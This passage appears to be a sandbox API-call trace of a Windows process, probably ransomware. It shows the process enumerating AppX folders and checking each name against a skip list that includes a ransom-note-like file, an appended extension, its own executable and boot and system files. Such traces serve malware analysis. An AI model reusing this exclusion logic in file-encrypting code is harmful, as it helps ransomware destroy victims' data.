(lpString1="Microsoft.Appconnector_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.847] lstrcmpiW (lpString1="Microsoft.Appconnector_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Appconnector_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Appconnector_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.847] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Appconnector_8wekyb3d8bbwe" | out: lpString1="Microsoft.Appconnector_8wekyb3d8bbwe") returned="Microsoft.Appconnector_8wekyb3d8bbwe" [0055.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d1a0 [0055.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x98) returned 0x113ff8 [0055.848] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d1a8 | out: ListHead=0xf68b0, ListEntry=0x11d1a8) returned 0x11d368 [0055.848] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b091f87, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc89dadb, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0xc89dadb, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.BingFinance_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.BIN")) returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingFinance_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingFinance_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingFinance_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingFinance_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingFinance_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingFinance_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingFinance_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingFinance_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingFinance_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingFinance_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingFinance_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.848] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.BingFinance_8wekyb3d8bbwe" | out: lpString1="Microsoft.BingFinance_8wekyb3d8bbwe") returned="Microsoft.BingFinance_8wekyb3d8bbwe" [0055.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d3e0 [0055.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x96) returned 0x113878 [0055.848] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d3e8 | out: ListHead=0xf68b0, ListEntry=0x11d3e8) returned 0x11d1a8 [0055.848] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49716ce0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xa0d44ca, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0xa0d44ca, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.BingNews_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.BIN")) returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingNews_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingNews_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingNews_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingNews_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingNews_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingNews_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingNews_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingNews_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingNews_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingNews_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.848] lstrcmpiW (lpString1="Microsoft.BingNews_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.848] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.BingNews_8wekyb3d8bbwe" | out: lpString1="Microsoft.BingNews_8wekyb3d8bbwe") returned="Microsoft.BingNews_8wekyb3d8bbwe" [0055.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d4c0 [0055.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x90) returned 0x11ee90 [0055.848] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d4c8 | out: ListHead=0xf68b0, ListEntry=0x11d4c8) returned 0x11d3e8 [0055.849] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45133c70, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x556dcf4, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0x556dcf4, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.BingSports_8wekyb3d8bbwe", cAlternateFileName="MICROS~3.BIN")) returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingSports_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingSports_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingSports_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingSports_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingSports_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingSports_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingSports_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingSports_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingSports_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingSports_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingSports_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.849] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.BingSports_8wekyb3d8bbwe" | out: lpString1="Microsoft.BingSports_8wekyb3d8bbwe") returned="Microsoft.BingSports_8wekyb3d8bbwe" [0055.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d4a0 [0055.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x94) returned 0x113cd8 [0055.849] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d4a8 | out: ListHead=0xf68b0, ListEntry=0x11d4a8) returned 0x11d4c8 [0055.849] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x428d1e5f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x31f6a27, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0x31f6a27, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.BingWeather_8wekyb3d8bbwe", cAlternateFileName="MICROS~4.BIN")) returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingWeather_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingWeather_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingWeather_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingWeather_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingWeather_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingWeather_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingWeather_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingWeather_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingWeather_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingWeather_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BingWeather_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.849] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.BingWeather_8wekyb3d8bbwe" | out: lpString1="Microsoft.BingWeather_8wekyb3d8bbwe") returned="Microsoft.BingWeather_8wekyb3d8bbwe" [0055.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d220 [0055.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x96) returned 0x113918 [0055.849] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d228 | out: ListHead=0xf68b0, ListEntry=0x11d228) returned 0x11d4a8 [0055.849] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66d77fef, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7d0704ba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7d17b532, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.BioEnrollment_cw5n1h2txyewy", cAlternateFileName="MICROS~1.BIO")) returned 1 [0055.849] lstrcmpiW (lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.850] lstrcmpiW (lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.850] lstrcmpiW (lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.850] lstrcmpiW (lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2=".") returned 1 [0055.850] lstrcmpiW (lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2="..") returned 1 [0055.850] lstrcmpiW (lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.850] lstrcmpiW (lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.850] lstrcmpiW (lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.850] lstrcmpiW (lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.850] lstrcmpiW (lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.850] lstrcmpiW (lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.850] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.BioEnrollment_cw5n1h2txyewy" | out: lpString1="Microsoft.BioEnrollment_cw5n1h2txyewy") returned="Microsoft.BioEnrollment_cw5n1h2txyewy" [0055.851] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d480 [0055.851] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9a) returned 0xf12e0 [0055.851] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d488 | out: ListHead=0xf68b0, ListEntry=0x11d488) returned 0x11d228 [0055.851] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3df817ee, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x131e209, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0x131e209, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.CommsPhone_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.COM")) returned 1 [0055.851] lstrcmpiW (lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.851] lstrcmpiW (lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.851] lstrcmpiW (lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.851] lstrcmpiW (lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.851] lstrcmpiW (lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.851] lstrcmpiW (lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.851] lstrcmpiW (lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.851] lstrcmpiW (lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.851] lstrcmpiW (lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.851] lstrcmpiW (lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.851] lstrcmpiW (lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.851] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.CommsPhone_8wekyb3d8bbwe" | out: lpString1="Microsoft.CommsPhone_8wekyb3d8bbwe") returned="Microsoft.CommsPhone_8wekyb3d8bbwe" [0055.851] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d1e0 [0055.851] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x94) returned 0x1139b8 [0055.851] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d1e8 | out: ListHead=0xf68b0, ListEntry=0x11d1e8) returned 0x11d488 [0055.851] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a9f4516, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xffc77b6a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xffc77b6a, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.ConnectivityStore_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.CON")) returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.852] lstrcmpiW (lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.852] lstrcmpiW (lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.852] lstrcmpiW (lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.852] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.ConnectivityStore_8wekyb3d8bbwe" | out: lpString1="Microsoft.ConnectivityStore_8wekyb3d8bbwe") returned="Microsoft.ConnectivityStore_8wekyb3d8bbwe" [0055.852] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d240 [0055.852] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa2) returned 0x1184f8 [0055.852] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d248 | out: ListHead=0xf68b0, ListEntry=0x11d248) returned 0x11d1e8 [0055.852] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x767aed3b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x767fb19c, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x767fb19c, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.CredDialogHost_cw5n1h2txyewy", cAlternateFileName="MICROS~1.CRE")) returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.852] lstrcmpiW (lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy", lpString2=".") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy", lpString2="..") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.852] lstrcmpiW (lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.852] lstrcmpiW (lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.853] lstrcmpiW (lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.853] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.CredDialogHost_cw5n1h2txyewy" | out: lpString1="Microsoft.CredDialogHost_cw5n1h2txyewy") returned="Microsoft.CredDialogHost_cw5n1h2txyewy" [0055.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d160 [0055.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9c) returned 0x10c928 [0055.853] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d168 | out: ListHead=0xf68b0, ListEntry=0x11d168) returned 0x11d248 [0055.853] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe87ff8e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xfe8f2692, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe8f2692, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.DES")) returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.853] lstrcmpiW (lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.853] lstrcmpiW (lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.853] lstrcmpiW (lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.853] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe" | out: lpString1="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe") returned="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe" [0055.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d460 [0055.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa6) returned 0x1192b8 [0055.853] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d468 | out: ListHead=0xf68b0, ListEntry=0x11d468) returned 0x11d168 [0055.853] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388df267, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xfd81bc01, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfd81bc01, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Getstarted_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.GET")) returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.Getstarted_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.Getstarted_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.Getstarted_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.853] lstrcmpiW (lpString1="Microsoft.Getstarted_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.Getstarted_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.Getstarted_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.853] lstrcmpiW (lpString1="Microsoft.Getstarted_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.Getstarted_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.853] lstrcmpiW (lpString1="Microsoft.Getstarted_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.Getstarted_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.853] lstrcmpiW (lpString1="Microsoft.Getstarted_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.854] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Getstarted_8wekyb3d8bbwe" | out: lpString1="Microsoft.Getstarted_8wekyb3d8bbwe") returned="Microsoft.Getstarted_8wekyb3d8bbwe" [0055.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d180 [0055.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x94) returned 0x113af8 [0055.854] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d188 | out: ListHead=0xf68b0, ListEntry=0x11d188) returned 0x11d468 [0055.854] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x695414de, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7b2c8ffc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7b44678d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.LockApp_cw5n1h2txyewy", cAlternateFileName="MICROS~1.LOC")) returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.LockApp_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.LockApp_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.LockApp_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.854] lstrcmpiW (lpString1="Microsoft.LockApp_cw5n1h2txyewy", lpString2=".") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.LockApp_cw5n1h2txyewy", lpString2="..") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.LockApp_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.854] lstrcmpiW (lpString1="Microsoft.LockApp_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.LockApp_cw5n1h2txyewy", lpString2="pagefile.sys") returned 